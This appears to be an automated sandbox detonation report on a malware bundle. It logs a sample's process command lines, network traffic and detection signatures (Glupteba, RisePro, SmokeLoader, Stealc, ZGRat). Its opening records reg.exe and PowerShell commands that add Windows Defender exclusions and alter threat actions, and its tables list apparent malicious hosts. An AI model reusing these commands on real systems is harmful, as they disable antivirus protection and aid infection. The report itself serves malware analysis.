"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IiRTlIkCOmnQC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IiRTlIkCOmnQC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LoqUitafHMeQMjVNAtR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LoqUitafHMeQMjVNAtR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NXJhSTlNVQUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NXJhSTlNVQUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mePNjhakU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mePNjhakU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zzVcilLLhiPU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zzVcilLLhiPU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\LSnoZghYDRjXCXVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\LSnoZghYDRjXCXVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\MJtmiEaOySOnsMbTj\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mMqUxMafZteBAeom\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mMqUxMafZteBAeom\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IiRTlIkCOmnQC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IiRTlIkCOmnQC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IiRTlIkCOmnQC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LoqUitafHMeQMjVNAtR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LoqUitafHMeQMjVNAtR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NXJhSTlNVQUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NXJhSTlNVQUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mePNjhakU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mePNjhakU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zzVcilLLhiPU2" /t REG_DWORD /d 0 /reg:32
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | 45.16.20.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 104.26.9.59:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 59.9.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | acenitive.shop | udp |
| US | 8.8.8.8:53 | triedchicken.net | udp |
| US | 8.8.8.8:53 | vk.com | udp |
| DE | 185.172.128.127:80 | 185.172.128.127 | tcp |
| US | 8.8.8.8:53 | 294down-river.sbs | udp |
| US | 8.8.8.8:53 | def.bestsup.su | udp |
| US | 8.8.8.8:53 | cczhk.com | udp |
| RU | 147.45.47.101:80 | 147.45.47.101 | tcp |
| US | 8.8.8.8:53 | medfioytrkdkcodlskeej.net | udp |
| US | 8.8.8.8:53 | monoblocked.com | udp |
| US | 8.8.8.8:53 | cleued.com | udp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| US | 104.21.67.206:80 | 294down-river.sbs | tcp |
| US | 188.114.97.2:80 | acenitive.shop | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| US | 104.21.91.214:80 | triedchicken.net | tcp |
| US | 188.114.97.2:80 | acenitive.shop | tcp |
| US | 104.21.4.60:80 | cleued.com | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| US | 104.21.29.103:80 | def.bestsup.su | tcp |
| US | 188.114.97.2:80 | acenitive.shop | tcp |
| US | 104.21.4.60:80 | cleued.com | tcp |
| US | 104.21.91.214:80 | triedchicken.net | tcp |
| US | 188.114.97.2:80 | acenitive.shop | tcp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 188.114.97.2:80 | acenitive.shop | tcp |
| US | 104.21.4.60:80 | cleued.com | tcp |
| US | 104.21.91.214:80 | triedchicken.net | tcp |
| US | 188.114.97.2:80 | acenitive.shop | tcp |
| US | 188.114.97.2:443 | acenitive.shop | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| US | 104.21.4.60:443 | cleued.com | tcp |
| US | 104.21.91.214:443 | triedchicken.net | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| US | 188.114.97.2:443 | acenitive.shop | tcp |
| US | 104.21.67.206:443 | 294down-river.sbs | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| KR | 211.168.53.110:80 | cczhk.com | tcp |
| RU | 91.215.85.209:443 | medfioytrkdkcodlskeej.net | tcp |
| US | 8.8.8.8:53 | pergor.com | udp |
| RU | 45.130.41.108:443 | monoblocked.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| US | 8.8.8.8:53 | 127.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.67.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.97.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.91.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.47.45.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.4.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.29.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.129.240.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.85.215.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.41.130.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.53.168.211.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| US | 172.67.156.81:443 | pergor.com | tcp |
| GB | 2.19.169.32:80 | x2.c.lencr.org | tcp |
| KR | 211.168.53.110:80 | cczhk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| US | 8.8.8.8:53 | carthewasher.net | udp |
| US | 188.114.96.2:443 | carthewasher.net | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| NL | 194.104.136.64:443 | 632432.site | tcp |
| US | 8.8.8.8:53 | 81.156.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.136.104.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.96.114.188.in-addr.arpa | udp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:80 | vk.com | tcp |
| RU | 87.240.129.133:443 | vk.com | tcp |
| RU | 87.240.129.133:443 | vk.com | tcp |
| US | 8.8.8.8:53 | sun6-22.userapi.com | udp |
| RU | 87.240.129.133:443 | vk.com | tcp |
| NL | 95.142.206.2:443 | sun6-22.userapi.com | tcp |
| RU | 87.240.129.133:443 | vk.com | tcp |
| RU | 87.240.129.133:443 | vk.com | tcp |
| US | 8.8.8.8:53 | 226.20.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.206.142.95.in-addr.arpa | udp |
| RU | 87.240.129.133:443 | vk.com | tcp |
| US | 8.8.8.8:53 | psv4.userapi.com | udp |
| RU | 87.240.137.134:443 | psv4.userapi.com | tcp |
| RU | 87.240.129.133:443 | vk.com | tcp |
| US | 8.8.8.8:53 | sun6-20.userapi.com | udp |
| NL | 95.142.206.0:443 | sun6-20.userapi.com | tcp |
| RU | 87.240.129.133:443 | vk.com | tcp |
| US | 8.8.8.8:53 | sun6-21.userapi.com | udp |
| NL | 95.142.206.1:443 | sun6-21.userapi.com | tcp |
| NL | 95.142.206.1:443 | sun6-21.userapi.com | tcp |
| RU | 87.240.129.133:443 | vk.com | tcp |
| NL | 95.142.206.0:443 | sun6-20.userapi.com | tcp |
| US | 8.8.8.8:53 | 134.137.240.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.206.142.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.206.142.95.in-addr.arpa | udp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| DE | 185.172.128.24:80 | 185.172.128.24 | tcp |
| US | 8.8.8.8:53 | 24.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| US | 172.67.139.220:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | iplis.ru | udp |
| US | 104.21.63.150:443 | iplis.ru | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.21.4.208:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 220.139.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.63.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.4.21.104.in-addr.arpa | udp |
| RU | 193.233.132.67:50505 | | tcp |
| US | 8.8.8.8:53 | villagemagneticcsa.fun | udp |
| US | 8.8.8.8:53 | healthproline.pro | udp |
| US | 188.114.96.2:443 | healthproline.pro | tcp |
| US | 8.8.8.8:53 | chocolatedepressofw.fun | udp |
| US | 8.8.8.8:53 | lighterepisodeheighte.fun | udp |
| US | 8.8.8.8:53 | problemregardybuiwo.fun | udp |
| US | 8.8.8.8:53 | theoryapparatusjuko.fun | udp |
| US | 8.8.8.8:53 | prescriptionstorageag.fun | udp |
| US | 8.8.8.8:53 | snuggleapplicationswo.fun | udp |
| US | 8.8.8.8:53 | edurestunningcrackyow.fun | udp |
| US | 8.8.8.8:53 | smallrabbitcrossing.site | udp |
| US | 8.8.8.8:53 | pooreveningfuseor.pw | udp |
| US | 8.8.8.8:53 | punchtelephoneverdi.store | udp |
| US | 8.8.8.8:53 | turkeyunlikelyofw.shop | udp |
| US | 8.8.8.8:53 | telephoneverdictyow.site | udp |
| US | 104.21.76.253:443 | turkeyunlikelyofw.shop | tcp |
| US | 8.8.8.8:53 | strainriskpropos.store | udp |
| US | 8.8.8.8:53 | associationokeo.shop | udp |
| US | 172.67.147.18:443 | associationokeo.shop | tcp |
| US | 8.8.8.8:53 | 67.132.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.76.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.147.67.172.in-addr.arpa | udp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| US | 104.26.9.59:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| NL | 195.20.16.46:80 | 195.20.16.46 | tcp |
| US | 8.8.8.8:53 | 46.16.20.195.in-addr.arpa | udp |
| NL | 195.20.16.46:80 | 195.20.16.46 | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| RU | 5.42.65.31:48396 | | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.65.42.5.in-addr.arpa | udp |
| US | 104.21.63.150:443 | iplis.ru | tcp |
| US | 104.21.4.208:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 22.249.124.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.178.17.96.in-addr.arpa | udp |
| DE | 159.69.103.8:9001 | 159.69.103.8 | tcp |
| DE | 159.69.103.8:9001 | 159.69.103.8 | tcp |
| DE | 159.69.103.8:9001 | 159.69.103.8 | tcp |
| DE | 159.69.103.8:9001 | 159.69.103.8 | tcp |
| US | 8.8.8.8:53 | 1ade4581-166c-46b1-a668-d765375a1246.uuid.alldatadump.org | udp |
| US | 8.8.8.8:53 | sjyey.com | udp |
| KR | 211.53.230.67:80 | sjyey.com | tcp |
| US | 8.8.8.8:53 | 67.230.53.211.in-addr.arpa | udp |
| KR | 211.53.230.67:80 | sjyey.com | tcp |
| KR | 211.53.230.67:80 | sjyey.com | tcp |
| KR | 211.53.230.67:80 | sjyey.com | tcp |
| US | 8.8.8.8:53 | server6.alldatadump.org | udp |
| US | 8.8.8.8:53 | stun2.l.google.com | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| BG | 185.82.216.108:443 | server6.alldatadump.org | tcp |
| IT | 142.251.27.127:19302 | stun2.l.google.com | udp |
| US | 8.8.8.8:53 | walkinglate.com | udp |
| US | 104.21.23.184:443 | walkinglate.com | tcp |
| US | 8.8.8.8:53 | 127.27.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.216.82.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.130.159.162.in-addr.arpa | udp |
| KR | 211.53.230.67:80 | sjyey.com | tcp |
| US | 8.8.8.8:53 | 184.23.21.104.in-addr.arpa | udp |
| KR | 211.53.230.67:80 | sjyey.com | tcp |
| KR | 211.53.230.67:80 | sjyey.com | tcp |
| KR | 211.53.230.67:80 | sjyey.com | tcp |
| BG | 185.82.216.108:443 | server6.alldatadump.org | tcp |
| US | 8.8.8.8:53 | 16.173.189.20.in-addr.arpa | udp |
| BG | 185.82.216.108:443 | server6.alldatadump.org | tcp |
Files
memory/4996-0-0x0000000140000000-0x0000000140C54000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:58
Platform
win10v2004-20240221-en
Max time kernel
141s
Max time network
157s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Resource\TypeSupport\Unicode\Mappings\win\CP1252.txt
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
Files
Analysis: behavioral16
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:58
Platform
win10v2004-20240221-en
Max time kernel
134s
Max time network
156s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Resource\TypeSupport\Unicode\Mappings\win\CP1253.txt
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.179.89.13.in-addr.arpa | udp |
Files
Analysis: behavioral24
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:58
Platform
win10v2004-20240221-en
Max time kernel
131s
Max time network
156s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Resource\resources.pak
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.178.17.96.in-addr.arpa | udp |
Files
Analysis: behavioral25
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:57
Platform
win7-20240215-en
Max time kernel
119s
Max time network
125s
Command Line
Signatures
Enumerates physical storage devices
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\rundll32.exe | N/A |
Processes
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen C:\Users\Admin\AppData\Local\Temp\bentonite.png
Network
Files
memory/2880-0-0x0000000001E50000-0x0000000001E51000-memory.dmp
memory/2880-1-0x0000000001E50000-0x0000000001E51000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:57
Platform
win7-20240221-en
Max time kernel
31s
Max time network
153s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RisePro
SmokeLoader
Stealc
ZGRat
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
